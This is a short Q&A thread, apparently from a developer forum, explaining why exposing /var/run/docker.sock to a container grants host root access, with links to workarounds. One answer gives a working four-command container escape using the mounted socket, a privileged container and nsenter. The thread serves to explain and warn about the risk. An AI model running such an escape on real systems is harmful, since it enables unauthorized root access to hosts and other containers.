What is the Docker security risk of /var/run/docker.sock?
for the rest of us, could someone explain in clear terminology exactly what this "security issue" is?
The owner of the docker /var/run/docker.sock is root of the host where the container is running, with default group membership to docker group. That's why mounting var/run/docker.sock inside another container gives you root privileges since now you can do anything that a root user with group membership of docker can.
Does this effectively prohibit this approach from Production usage? If so, is there a workaround?
For a workaround may be these posts will help: https://integratedcode.us/2016/04/08/user-namespaces-sharing-the-docker-unix-socket/ and https://integratedcode.us/2016/04/20/sharing-the-docker-unix-socket-with-unprivileged-containers-redux/
Taking a step back, it would be useful to understand the usecase where you need to mount var/run/docker.sock and see if there are alternative ways to satisfying the usecase. Unfortunately, without a usecase description in the question, it is difficult to provide an alternative which avoids mounting the unix socket.
Good luck and kudos for trying to do the right thing!
This is an old question, but I hope I can actually give you a precise example.
could someone explain in clear terminology exactly what this "security issue" is?
Here is the core of the exploit:
sh0% docker run -v /var/run/docker.sock:/ourdocker.sock:ro -it ubuntu bash
sh1# docker -H unix:///ourdocker.sock run --privileged -v /:/host ubuntu bash
sh2# nsenter --mount=/host/proc/1/ns/mnt --pid=/host/proc/1/ns/pid
sh3# # now we are in the host namespaces with root access
If you use user namespaces this problem is harder to exploit but is still somewhat possible in certain scenarios (and you can still impact other containers running on the same host).
Please note that while the above example uses --privileged, it is possible to do this without --privileged (so even if you had a Docker AuthZ plugin which blocked --privileged you still wouldn't be safe from something like this).